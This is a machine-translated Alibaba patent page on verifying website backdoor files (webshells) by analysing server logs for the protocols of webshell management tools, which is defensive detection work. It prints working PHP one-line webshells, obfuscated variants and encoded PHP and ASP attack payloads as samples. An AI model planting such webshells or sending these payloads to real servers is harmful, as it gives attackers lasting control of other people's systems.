CN107104924A - The verification method and device of website backdoor file - Google Patents

The verification method and device of website backdoor file Download PDF

Info

Publication number
CN107104924A
CN107104924A CN201610096648.2A CN201610096648A CN107104924A CN 107104924 A CN107104924 A CN 107104924A CN 201610096648 A CN201610096648 A CN 201610096648A CN 107104924 A CN107104924 A CN 107104924A
Authority
CN
China
Prior art keywords
verified
file
internet access
record
access request
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Granted
Application number
CN201610096648.2A
Other languages
Chinese (zh)
Other versions
CN107104924B (en
Inventor
李相垚
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Alibaba Group Holding Ltd
Original Assignee
Alibaba Group Holding Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Alibaba Group Holding Ltd filed Critical Alibaba Group Holding Ltd
Priority to CN201610096648.2A priority Critical patent/CN107104924B/en
Publication of CN107104924A publication Critical patent/CN107104924A/en
Application granted granted Critical
Publication of CN107104924B publication Critical patent/CN107104924B/en
Active legal-status Critical Current
Anticipated expiration legal-status Critical

Links

Classifications

    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/14Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1425Traffic logging, e.g. anomaly detection
    • HELECTRICITY
    • H04ELECTRIC COMMUNICATION TECHNIQUE
    • H04LTRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00Network architectures or network communication protocols for network security
    • H04L63/08Network architectures or network communication protocols for network security for authentication of entities
    • H04L63/083Network architectures or network communication protocols for network security for authentication of entities using passwords

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Computer Hardware Design (AREA)
  • Computing Systems (AREA)
  • General Engineering & Computer Science (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Information Transfer Between Computers (AREA)

Abstract

The invention discloses a kind of verification method and device of website backdoor file.Wherein, this method includes:Obtain network access log recording;The communication protocol used according to access website backdoor file is analyzed network access log recording, chooses internet access request record to be verified;Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;Verify that internet access to be verified asks whether the file of record access is website backdoor file by the verification mode of selection.The mode accuracy that website backdoor file is determined by way of characteristic matching that the present invention is solved employed in correlation technique is relatively low, is also easy to produce the technical problem failed to report or reported by mistake.

Description

The verification method and device of website backdoor file
Technical field
The present invention relates to internet arena, in particular to a kind of verification method and device of website backdoor file.
Background technology
Webshell is website backdoor file, and " Web ", which is meant that, needs Website server open Web service, " shell " It is meant that the operating right for obtaining Website server to a certain extent.Webshell is with ASP, PHP, JSP or CGI etc. A kind of order performing environment that web page files form is present, generally using being write with Website server identical programming language Into being arranged in directory web site.Webshell is run from the arbitrary parameter of visitor's reception and in being added to native codes, then Operation result is returned into visitor again.Therefore, hacker is after a website is invaded, it will usually by Webshell and website service Normal web page files mix under device Web catalogues, just can use browser to access Webshell, to reach long-term control The purpose of Website server processed, wherein it is possible to include but is not limited to:Upload/download file, checks database, performs any journey Sequence order.Because programming language is versatile and flexible, new Webshell has lost static back door feature substantially, so as to light Ground bypasses the detection of back door identification facility.
Webshell management tools are communicated using special communication protocol with website backdoor file, so as to realize disk The functions such as catalogue browsing, file upload or download, execution system order, its main realization principle is:Uploaded in website Above-mentioned functions are converted into dynamic generation by one Webshell that can be accessed by Webshell management tools, Webshell management tools The code and form arranged with communication protocol is packaged, Webshell is sent in the way of accessing webpage by Content of Communication. Webshell is packaged after operation state code according to same communication protocol to operation result, then return again to Webshell management tools.Although the content communicated every time can have differences because of the difference of function, communication protocol is limited to Defect, communication every time always has partial content and meets certain feature.
Most hacker can select to use Webshell management tools pair after Webshell files are uploaded Webshell conducts interviews.Therefore, most of Webshell can have been associated with the access record of Webshell management tools Come.Although website backdoor file is ever-changing, the communication protocol in Webshell management tools that hacker commonly uses is constant.
Website back door detection method employed in correlation technique is to detect work by installing back door on Website server Tool, by being confirmed whether to have backdoor file to site file progress back door mark scanning.Work is detected at these website back doors It is essentially all, using Static Analysis Technology and sandbox dynamic debugging, syntax parsing to be carried out to code, constructs and holds in tool Row flow, then detects calling for dangerous function, whether finally draw code is website back door by way of simulating and performing As a result.
However, the drawbacks of this detection mode has very big:First, the programming language that website back door is used is varied , its unfixed file format adds the complexity of back door feature detection;Secondly, feature detection depends on file characteristic , often there is a kind of new backdoor file and is required for updating file characteristic library, feature database thus can be caused to consume excessive storage in storehouse Space;Then, website back door can all disguise oneself as oneself the normal web page files of website, easily to occur in detection process certain Quantity being failed to report or reports by mistake.
Moreover, programming language used in most of Website servers all supports the generation and operation of dynamic code, " a word wooden horse " backdoor file all the fashion at present just make use of this characteristic well, realize the encryption of code with mixing Confuse.This " a word wooden horse " backdoor file has lost conventional website back door feature completely, so as to easily around Cross file characteristic detection.
Therefore, the peace that hacker is had found by webmaster in order to avoid website backdoor file or configured by Website server Full software detection is arrived, and generally can all be selected " a word wooden horse " as backdoor file, is inserted into the normal webpage of Website server In file;Meanwhile, rear gate code is encrypted or obscured, does not seem website to cause backdoor file to get up on the surface The backdoor file of server.
Here is the example code of common " a word wooden horse " backdoor file, and its specific manifestation form is as follows:
<php
@eval($_POST['c']);
>
It will be clear that there is obvious " a word wooden horse " backdoor file spy in the code from above-mentioned code Levy, visitor to the incoming arbitrary code of eval functions and can perform, so eval is a dangerous function call, based on text The back door detection instrument of part feature can find such website backdoor file.
However, for gate code after a word wooden horse shown below:
<php
$ c=$ _ POST [' c'];
assert($c);
>
In the rear gate code despite the presence of assert this dangerous function call, but because variable " c " can not be confirmed Source, be mostly based on the back door detection instrument of file characteristic to the Detection results of such Webshell backdoor files in fact simultaneously It is undesirable.
In addition, gate code is as follows after a word wooden horse that base64 is encoded:
<php
Eval (gzuncompress (base64_decode (' eJxTiQ/wDw6JVk9Wjw ... UAEwkDMw= =')));
>
Above-mentioned rear gate code is by base64 codings and gzcompress compressions, and not any back door is special on the surface Levy, and gate code after just being restored only in actual moving process, therefore, conventional back door detect instrument to such website The detection of backdoor file is also helpless.
For it is above-mentioned the problem of, effective solution is not yet proposed at present.
The content of the invention
The embodiments of the invention provide a kind of verification method and device of website backdoor file, at least to solve correlation technique Employed in the mode accuracy that website backdoor file is determined by way of characteristic matching it is relatively low, be also easy to produce and fail to report or report by mistake Technical problem.
One side according to embodiments of the present invention there is provided a kind of verification method of website backdoor file, including:
Obtain network access log recording;The communication protocol used according to access website backdoor file is to network access day Will record is analyzed, and chooses internet access request record to be verified;Record is asked according to internet access to be verified The request type belonged to chooses verification mode;Verify that record is asked in internet access to be verified by the verification mode of selection The file of access is website backdoor file.
Alternatively, the communication protocol used according to access website backdoor file is divided network access log recording Analysis, choosing internet access request record to be verified includes:Using communication protocol to including in network access log recording Whole internet access request records carry out piecewise analytic one by one;It will include in request body content after parsing behind website The internet access request record of the fixed field set in code segment and/or communication protocol that door file is performed is defined as to be tested The internet access request record of card.
Alternatively, verification mode bag is chosen according to the belonged to request type of internet access request record to be verified Include:URL (URL) is extracted from the request row of internet access request record to be verified;According to URL bags The suffix portion content contained determines request type;According to request type checking is chosen for internet access request record to be verified Mode.
Alternatively, verify that internet access to be verified asks whether the file of record access is website by verification mode Backdoor file includes:Extract to access from internet access request record to be verified and connect password used in respective file; In the case where request type is PHP types or ASP types, searched from internet access request record to be verified with being connected The corresponding executable code section of password;Executable code section is run according to default calculation, operation result is generated; When operation result is consistent with default result, determine the file of internet access request record access to be verified for behind website Door file.
Alternatively, verify that internet access to be verified asks whether the file of record access is website by verification mode Backdoor file includes:Extract to access from internet access request record to be verified and connect password used in respective file; In the case where request type is JSP types, searched from internet access request record to be verified corresponding with connection password Executable code section;According to the executable code section of specified command function operation, generation shows result;Work as display When as a result meeting the functional characteristic of command function, determine the file of internet access request record access to be verified for behind website Door file.
Another aspect according to embodiments of the present invention, additionally provides a kind of checking device of website backdoor file, including:
Acquisition module, for obtaining as the network access log recording produced by outside access server;Analysis module, is used Network access log recording is analyzed in the communication protocol used according to access website backdoor file, chosen to be verified Internet access request record;Module is chosen, for according to the belonged to request class of internet access request record to be verified Type chooses verification mode;Authentication module, verifies that internet access to be verified asks to record for the verification mode by selection Whether the file of access is website backdoor file.
Alternatively, analysis module includes:Resolution unit, for using communication protocol to being included in network access log recording Whole internet access request record carry out piecewise analytic one by one;First determining unit, for by the request body after parsing The internet for including the code segment performed by website backdoor file and/or the fixed field set in communication protocol in content is visited Ask that request record is defined as internet access request record to be verified.
Alternatively, choosing module includes:First extraction unit, for asking from internet access request record to be verified Ask in row and extract URL;Second determining unit, the suffix portion content for being included according to URL determines request type;Choose single Member, for choosing verification mode according to request type for internet access request record to be verified.
Alternatively, authentication module includes:Second extraction unit, for being carried from internet access request record to be verified Take connection password used in access respective file;Searching unit, in the feelings that request type is PHP types or ASP types Under condition, executable code section corresponding with connection password is searched from internet access request record to be verified;Generation Unit, for running executable code section according to default calculation, generates operation result;3rd determining unit, is used for When operation result is consistent with default result, determine the file of internet access request record access to be verified for behind website Door file.
Alternatively, authentication module includes:Second extraction unit, for being carried from internet access request record to be verified Take connection password used in access respective file;Searching unit, in the case of being JSP types in request type, from treating Executable code section corresponding with connection password is searched in the internet access request record of checking;Generation unit, is used for According to the executable code section of specified command function operation, generation shows result;3rd determining unit, for when display knot When fruit meets the functional characteristic of command function, the file for determining internet access request record access to be verified is website back door File.
In embodiments of the present invention, it is not necessary to characteristic matching is carried out to backdoor file, but is used according to behind access website Door file using communication protocol the network access log recording retained on server is analyzed by the way of choose to be tested The internet access request record of card, and chosen according to the belonged to request type of internet access request record to be verified Verification mode confirm network backdoor file whether necessary being, so as to be effectively improved what website backdoor file was identified Success rate, significantly reduces the probability to failing to report or reporting by mistake in website backdoor file progress verification process, and then solve Mode accuracy that website backdoor file is determined by way of characteristic matching employed in correlation technique is relatively low, is also easy to produce The technical problem failed to report or reported by mistake.
Brief description of the drawings
Accompanying drawing described herein is used for providing a further understanding of the present invention, constitutes the part of the application, this hair Bright schematic description and description is used to explain the present invention, does not constitute inappropriate limitation of the present invention.In the accompanying drawings:
Fig. 1 is a kind of hardware configuration frame of the terminal of the verification method of website backdoor file of the embodiment of the present invention Figure;
Fig. 2 is the flow chart of the verification method of website backdoor file according to embodiments of the present invention;
Fig. 3 is the structured flowchart of the checking device of website backdoor file according to embodiments of the present invention;
Fig. 4 is the structured flowchart of the checking device of website backdoor file according to the preferred embodiment of the invention;
Fig. 5 is a kind of structured flowchart of terminal according to embodiments of the present invention.
Embodiment
In order that those skilled in the art more fully understand the present invention program, below in conjunction with the embodiment of the present invention Accompanying drawing, the technical scheme in the embodiment of the present invention is clearly and completely described, it is clear that described embodiment is only The embodiment of a part of the invention, rather than whole embodiments.Based on the embodiment in the present invention, ordinary skill people The every other embodiment that member is obtained under the premise of creative work is not made, should all belong to the model that the present invention is protected Enclose.
It should be noted that term " first " in description and claims of this specification and above-mentioned accompanying drawing, " Two " etc. be for distinguishing similar object, without for describing specific order or precedence.It should be appreciated that so using Data can exchange in the appropriate case, so as to embodiments of the invention described herein can with except illustrating herein or Order beyond those of description is implemented.In addition, term " comprising " and " having " and their any deformation, it is intended that cover Lid is non-exclusive to be included, for example, the process, method, system, product or the equipment that contain series of steps or unit are not necessarily limited to Those steps or unit clearly listed, but may include not list clearly or for these processes, method, product Or the intrinsic other steps of equipment or unit.
Embodiment 1
According to embodiments of the present invention, additionally provide a kind of embodiment of the method for the verification method of website backdoor file, it is necessary to Illustrate, can be in the computer system of such as one group computer executable instructions the step of the flow of accompanying drawing is illustrated Perform, and, although logical order is shown in flow charts, but in some cases, can be with suitable different from herein Sequence performs shown or described step.
The embodiment of the method that the embodiment of the present application one is provided can be in mobile terminal, terminal or similar fortune Calculate in device and perform.Exemplified by running on computer terminals, Fig. 1 is a kind of testing for website backdoor file of the embodiment of the present invention The hardware block diagram of the terminal of card method.As shown in figure 1, terminal 10 can include one or more (figures In only show one) (processor 102 can include but is not limited to Micro-processor MCV or PLD to processor 102 FPGA etc. processing unit), the memory 104 for data storage and the transmitting device 106 for communication function.Ability Domain those of ordinary skill is appreciated that the structure shown in Fig. 1 is only signal, and it does not cause limit to the structure of above-mentioned electronic installation It is fixed.For example, terminal 10 may also include than shown in Fig. 1 more either less components or with shown in Fig. 1 not Same configuration.
The website that memory 104 can be used in the software program and module of storage application software, such as embodiment of the present invention Corresponding programmed instruction/the module of verification method of backdoor file, processor 102 is stored in soft in memory 104 by operation Part program and module, so as to perform various function application and data processing, that is, realize testing for above-mentioned website backdoor file Card method.Memory 104 may include high speed random access memory, may also include nonvolatile memory, such as one or more magnetic Property storage device, flash memory or other non-volatile solid state memories.In some instances, memory 104 can further comprise The memory remotely located relative to processor 102, these remote memories can pass through network connection to terminal 10. The example of above-mentioned network includes but is not limited to internet, intranet, LAN, mobile radio communication and combinations thereof.
Transmitting device 106 is used to data are received or sent via a network.Above-mentioned network instantiation may include The wireless network that the communication providerses of terminal 10 are provided.In an example, transmitting device 106 is fitted including a network Orchestration (Network Interface Controller, NIC), its can be connected by base station with other network equipments so as to Internet is communicated.In an example, transmitting device 106 can be radio frequency (Radio Frequency, RF) module, its For wirelessly being communicated with internet.
Under above-mentioned running environment, this application provides the verification method of website backdoor file as shown in Figure 2.Fig. 2 is The flow chart of the verification method of website backdoor file according to embodiments of the present invention.This method includes following process step:
Step S202:Network access log recording is obtained, wherein, network access log recording can be by external client (for example:Personal computer) access home server and generate, naturally it is also possible to accessed by outside mobile terminal or other equipment Home server and generate;
Step S204:The communication protocol used according to access website backdoor file is divided network access log recording Analysis, chooses internet access request record to be verified;For example:Using the mode of identification Webshell communication protocols, in service The record that hacker accesses Webshell is found out in device daily record;
Step S206:Verification mode is chosen according to the request type that internet access request record to be verified is belonged to;
Step S208:The file of internet access request record access to be verified is verified by the verification mode of selection is No is website backdoor file.
Back door detection scheme provided in correlation technique can only search the feature in static code, or by grammer point Simulate and perform after analysis, but real code reverse can not all be come out, also None- identified goes out the real behavior of program.Using this hair The technical scheme that bright embodiment is provided, it is not necessary to characteristic matching is carried out to backdoor file, but is used according to behind access website Door file using communication protocol the network access log recording retained on server is analyzed by the way of choose to be tested The internet access request record of card, and chosen according to the belonged to request type of internet access request record to be verified Verification mode confirm network backdoor file whether necessary being, it can not only recognize conventional website backdoor file and can also The website backdoor file obscured is passed through in enough identification, so that the success rate that website backdoor file is identified is effectively improved, The probability to failing to report or reporting by mistake in website backdoor file progress verification process is significantly reduced, and then solves related skill The mode accuracy that website backdoor file is determined by way of characteristic matching employed in art is relatively low, is also easy to produce and fails to report or miss The technical problem of report.
Alternatively, in step S204, the communication protocol used according to access website backdoor file is to network access day Will record is analyzed, and is chosen internet access request record to be verified and be may comprise steps of:
Step S1:Using communication protocol to included in network access log recording whole internet access request record by One carries out piecewise analytic;
Step S2:To include in request body content after parsing the code segment that is performed by website backdoor file and/or The internet access request record of the fixed field set in communication protocol is defined as internet access request record to be verified.
Website backdoor file would generally leave the access number of the Webshell pages in the Web log recordings of Website server Recorded according to being submitted with data.Also, website backdoor file is required for just performing specific order after external parameter is received, and In order to ensure website back door can only be used by visitor, backdoor file usually there will be a unique connection password, and this Connection password can be obtained by analyzing log content.The operation principle of Webshell management tools is essentially consisted in:Please in Web The command parameter of coded treatment is inserted through in asking, wherein, first parameter is connection password, and back door text is then passed to again Part.
The communication protocol of Webshell management tools is broadly divided into following three layers:
First layer is performs the function of PHP code, for example:Eval, assert etc.;
The second layer is the decoding functions that base64 is encoded, for example:base64_decode;
Third layer is the request body content mentioned in code after base64 coded treatments, i.e. above-mentioned steps S2, It is also the part that the application needs to pay close attention to and parse.
Hacker is just stored in above-mentioned third layer after base64 coded treatments as the code performed desired by visitor Code in.At present, the Webshell management tools of main flow all can in order to hide the killing that server security detects instrument Selection is sought to improve in first layer or the second layer, and rear gate code is obscured with realizing.However, no matter which kind of change side used Formula, the start-up portion of base64 codings is changeless under normal conditions, therefore, it can perform matching according to features described above Operation.
In a Web request, user can be with self-defined many parameters, such as:URL (URL), user Act on behalf of (User-Agent), be stored in the data (Cookie) on user local terminal, submit data (post_data) etc..This A little controllable dots can be used for Transfer Parameters by Webshell management tools.Therefore, just can be with by using log analysis process Determine whether the content of these controllable dots in each web log file meets the characteristics of communication protocol of Webshell management tools.Such as Fruit meets the characteristics of communication protocol of Webshell management tools, then can be stored in the information such as the URL of this daily record, connection password In database, further detection is waited.
Below by respectively with the internet access request, the internet access of ASP types request and JSP classes of PHP types Above-mentioned log analysis process is described in further detail exemplified by the internet access request of type.
1. the internet access for PHP types is asked
Assuming that there is a webshell under the root hehe.php of targeted website, its content is as follows:
<php@eval($_POST[8]);>
This is common, relatively simple PHP types " a word wooden horse ".
The form of the normal access request sent by browser is specific as follows:
GET/hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
However, if the PHP type of access sent using Webshell management tools is asked, specific manifestation form is such as Under:
POST/hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
8=@eval (base64_decode (QGV2YWwBKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpOw));&z0= QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ 2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+ fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGP T1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO3 1lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjs kVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29u dmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkU CkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUj T9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZG llKCk7&z1= RDpcXHhhbXBwXFxodGRvY3NcXA==
Need to analyze the access request that above-mentioned use Webshell management tools are sent below:
First, the equal sign left-hand digit " 8 " occurred for the first time in POST contents is the password of the Webshell, its $ _ POST [8] in correspondence code;That is, first is appeared in each access request sent by Webshell management tools The content on the equal sign left side is the connection password of the Webshell.
Secondly, it is one section of PHP code that the content on the right of equal sign is appeared in for the first time, and its basic format is usually:@eval (base64_decode(var1));Wherein, the content " var1 " inside innermost layer bracket by base64 it is encoded in Hold, then decoding functions in the one layer of bracket in outside, and it is outermost, it is that PHP performs function;In addition, the content inside var1 is usual For@eval (base64_decode ($ _ POST [z0]));
Finally, ";" content that occurs below may meet one or more variable z1-z5, these variables be required for through Base64 encryptions are crossed, and can then show some PHP codes after the decryption.
Based on above-mentioned analysis, the log analysis process that the embodiment of the present invention is provided needs to complete following work:
(1) Webshell connection code extraction is come out in the access request sent from Webshell management tools.
(2) in@eval (base64_decode (var1)) var1 of innermost layer be in some cases it is discontinuous, Its difficulty of matching is larger, but the content in base64 usually requires the action of correspondence " receiving follow-up variable " (for example:Receive z0).And the mode received can only be " $ _ POST [z0] ", therefore it may only be necessary to match the corresponding base64 words of $ _ POST [z0] Symbol string, substantially just it can be assumed that the access request is sent by Webshell management tools.But, it is contemplated that z0 is can be with Change, therefore generally only match " $ _ POST [".
" $ _ POST [" is the fixed field set in the communication protocol mentioned in step S2 it should be noted that above-mentioned.
(3) performed above-mentioned match " result that $ _ POST [" operation is obtained be only the access request it is doubtful by Webshell management tools are sent, and its reason is:$ _ POST [can may also be encrypted in regular traffic request.This When, then the base64 contents in further matching z1-z5 are needed, necessarily occur that Webshell can be performed in content in this section Code, for example:@set_magic_quotes_runtime(0);@set_time_limit (0), are only further being matched It is a Webshell that this can be just further determined that after base64 contents in z1-z5.
It should be noted that what is occurred in above-mentioned z1-z5 necessarily occurs the code as step that Webshell can be performed The code segment performed by website backdoor file mentioned in S2.
2. the internet access for ASP types is asked
Assuming that the ASP type of access sent using Webshell management tools is asked, its specific manifestation form is as follows:
Ysh=Execute (" Execute (" " On+Error+Resume+Next:Function+bd(byVal+s):For + i=1+To+Len (s)+Step+2:C=Mid (s, i, 2):If+IsNumeric(Mid(s,i,1))+Then:Execute (" " " " bd=bd&chr (s &H " " " " &c& " " " ") " " " "):Else:Execute (" " " " bd=bd&chr (s &H " " " " &c&Mid (s,i+2,2)&"""")""""):I=i+2:End+If""&chr(10)&""Next:End+Function: Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""&bd("""" 44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E20464 4286474293A46443D596561722864742926222D223A4966204C656E284D6F6E74682864742929 3D31205468656E3A4644203D204644262230223A456E642049663A46443D4644264D6F6E74682 864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D46442622 30223A456E642049663A46443D464426446179286474292622202226466F726D6174446174655 4696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D3120546865 6E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E6 42046756E6374696F6E3A53455420433D4372656174654F626A6563742822536372697074696E 672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C64657 2282222265252262222293A496620457272205468656E3A526573706F6E73652E577269746528 224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723 A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F 6E73652E577269746520462E4E616D6526636872283437292663687228392926464428462E446 174654C6173744D6F646966696564292663687228392926636872283438292663687228392926 432E476574466F6C64657228462E50617468292E6174747269627574657326636872283130293 A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E57 72697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696 5642926636872283929264C2E73697A652663687228392926432E47657446696C65284C2E5061 7468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")): Response.Write(""""|<-""""):Response.End " ") ") &z1= 663A5C5C7573725C5C4C6F63616C557365725C5C717877313539303936303432355C5C636F6E6 669675C5C
Based on above-mentioned analysis, the log analysis process that the embodiment of the present invention is provided needs to complete following work:
(1) it is identical with the processing mode of above-mentioned PHP type requests, in the access request sent from Webshell management tools Webshell connection code extraction is come out.
(2) compared to PHP type requests, code before ASP type requests to obscure degree higher, its difficulty of matching compared with Greatly, it therefore, it can omit the matching of the code section before ASP type requests.I.e. need not be by judging the request after parsing The fixed field that sets whether is included in communication protocol in body matter to determine that record is asked in internet access to be verified.
(3) character string that there is equivalent length the center section of ASP type requests is encoded by hexadecimal (hex), wherein, The function CreateObject (" Scripting.FileSystemObject ") that Webshell has to use is contained, i.e., " 4372656174654f626a6563742822536372697074696e672e46696c65 after hexadecimal code 53797374656d4f626a6563742229”.If can primarily determine that this is by the above-mentioned function of match hit Individual Webshell.
It should be noted that what is occurred in above-mentioned z1-z5 necessarily occurs the code as step that Webshell can be performed The code segment performed by website backdoor file mentioned in S2.
3. the internet access for JSP types is asked
Assuming that the JSP type of access sent using Webshell management tools is asked, its specific manifestation form is as follows:
Ch023=B&z0=UTF-8&z1=D:\\Install+Software\\tomcat7\\webapps\\cxzm\\
Based on above-mentioned analysis, the log analysis process that the embodiment of the present invention is provided needs to complete following work:
(1) it is identical with the processing mode of above-mentioned PHP type requests, in the access request sent from Webshell management tools Webshell connection code extraction is come out.
(2) the uppercase implication on the right of the equal sign occurred for the first time in above-mentioned JSP type requests represents a behaviour Make code name, can be represented from A-Z and perform different operations.And the z0 in JSP type requests is held essentially constant, because This, can be used herein canonical matching=[A-Z] &z0=.
It should be noted that the internet access request for JSP types is usually only necessary to carry in execution above-mentioned steps S2 To on whether including the matching operation of fixed field set in communication protocol in the request body content after parsing.
Alternatively, in step S206, selected according to the request type that internet access request record to be verified is belonged to Verification mode is taken to include following operation:
Step S3:URL is extracted from the request row of internet access request record to be verified;
Step S4:The suffix portion content included according to URL determines request type;
Step S5:According to request type verification mode is chosen for internet access request record to be verified.
For example:In the request row " POST/ of the PHP type of access request sent using Webshell management tools In hehe.php HTTP/1.1 ", URL " hehe.php " can be extracted from the request row by parsing;Then, by this URL suffix portion content " .php " can determine that this is the internet access request of a PHP type, it is possible thereby to further pin The proof scheme of PHP types is chosen in internet access request to PHP types.
Alternatively, in step S208, verify that record access is asked in internet access to be verified by verification mode Whether file is that website backdoor file may comprise steps of:
Step S6:Extract to access from internet access request record to be verified and connect close used in respective file Code;
Step S7:In the case where request type is PHP types or ASP types, asked from internet access to be verified Executable code section corresponding with connection password is searched in record;
Step S8:Executable code section is run according to default calculation, operation result is generated;
Step S9:When operation result is consistent with default result, determine that internet access request record to be verified is visited The file asked is website backdoor file.
According to the characteristics of communication protocol for meeting Webshell management tools extracted during above-mentioned log analysis URL, it must be just a backdoor file to be not meant to the corresponding site files of this URL, and its reason is:On current network Scans web sites backdoor file can be actively removed in the presence of many hackers, and these scan requests also carry fixed URL addresses in itself, The communication protocol of Webshell management tools can be also used to attempt to interact with file destination in these scan requests simultaneously, Therefore, these scan requests are likely to meet the characteristics of communication protocol of part Webshell management tools, and then can be recognized It is backdoor file to be set to.So, the presence of the behavior such as above-mentioned hacker's active scan website backdoor file is easily caused URL corresponding Site file is that backdoor file has a large amount of wrong reports.
Accordingly, it would be desirable to take effective technological means to exclude because of behaviors such as above-mentioned hacker's active scan website backdoor files Produced wrong report.In this regard, firstly, it is necessary to separately designing a set of back door authentication for the backdoor file of each programming language Case;Secondly, the back door URL of the communication feature for meeting Webshell management tools obtained according to log analysis process suffix name It is determined that using any specific proof scheme;Then, recycle connection password to verify backdoor file, and finally verify Successful website back door URL just can definitely be regarded as the website backdoor file that there is currently.
1. for the internet access request of PHP types:
Because the content meeting being serviced device of the equal sign another side relative with connection password is directly performed, it therefore, it can first taste Examination allows file to perform a simple calculations, then shows result.If the content returned by computing with it is expected that As a result consistent, then it is Webshell to confirm this document.
Assuming that the access request of the PHP types sent using Webshell management tools is as follows:
POST/hehe.php HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Executable code section corresponding with the connection password is searched by connecting password figure " 8 ", and according to as follows The calculation generation operation result of setting:
8=die (md5 (233333));
If operation result return fb0b32aeafac4591c7ae6d5e58308344 and with expected result of calculation phase Unanimously, then confirm to be proved to be successful, the internet access of the PHP types asks accessed file to be website backdoor file.
2. for the internet access request of ASP types:
It verifies that principle is identical with the checking principle of the access request of PSP types, that is, assumes to manage work using Webshell The access request for having the ASP types sent is as follows:
POST/hehe.asp HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Executable code section corresponding with the connection password is searched by connecting password figure " 8 ", and according to as follows The calculation generation operation result of setting:
8=response.write (654363512+3656342)
If operation result returns to 658019854 and consistent with expected result of calculation, confirmation is proved to be successful, should The internet access of ASP types asks accessed file to be website backdoor file.
Alternatively, in step S208, verify that record access is asked in internet access to be verified by verification mode Whether file is that website backdoor file can include following operation:
Step S10:Extract to access from internet access request record to be verified and connect close used in respective file Code;
Step S11:In the case where request type is JSP types, looked into from internet access request record to be verified Look for executable code section corresponding with connection password;
Step S12:According to the executable code section of specified command function operation, generation shows result;
Step S13:When showing that result meets the functional characteristic of command function, internet access request to be verified is determined The file of record access is website backdoor file.
For the internet access request of JSP types:
The code in POST contents can not be directly performed due to JSP wooden horses, and a small amount of preset instructions can only be performed, because This, can attempt to perform " row catalogue " operation, i.e.,:Assuming that the access of the JSP types sent using Webshell management tools please Ask as follows:
POST/hehe.jsp HTTP/1.1
Content-Type:application/x-www-form-urlencoded
Host:127.0.0.1
Content-Length:765
Connection:Close
Executable code section corresponding with the connection password is searched by connecting password figure " 8 ", and according to as follows The function command generation of setting shows result:
8=A&z0=UTF-8
If carried in the display result returned " |<- " and "->| ", then show currently to perform is " row catalogue " operation, It is proved to be successful, the internet access of the JSP types asks accessed file to be website backdoor file.
It should be noted that for foregoing each method embodiment, in order to be briefly described, therefore it is all expressed as a series of Combination of actions, but those skilled in the art should know, the present invention is not limited by described sequence of movement because According to the present invention, some steps can be carried out sequentially or simultaneously using other.Secondly, those skilled in the art should also know Know, embodiment described in this description belongs to preferred embodiment, involved action and module is not necessarily of the invention It is necessary.
Through the above description of the embodiments, those skilled in the art can be understood that according to above-mentioned implementation The verification method of the website backdoor file of example can add the mode of required general hardware platform to realize by software, also may be used certainly With by hardware, but the former is more preferably embodiment in many cases.Understood based on such, technical scheme sheet The part contributed in other words to prior art in matter can be embodied in the form of software product, computer software production Product are stored in a storage medium (such as ROM/RAM, magnetic disc, CD), including some instructions are to cause a station terminal equipment (can be mobile phone, computer, server, or network equipment etc.) performs the method described in each embodiment of the invention.
Embodiment 2
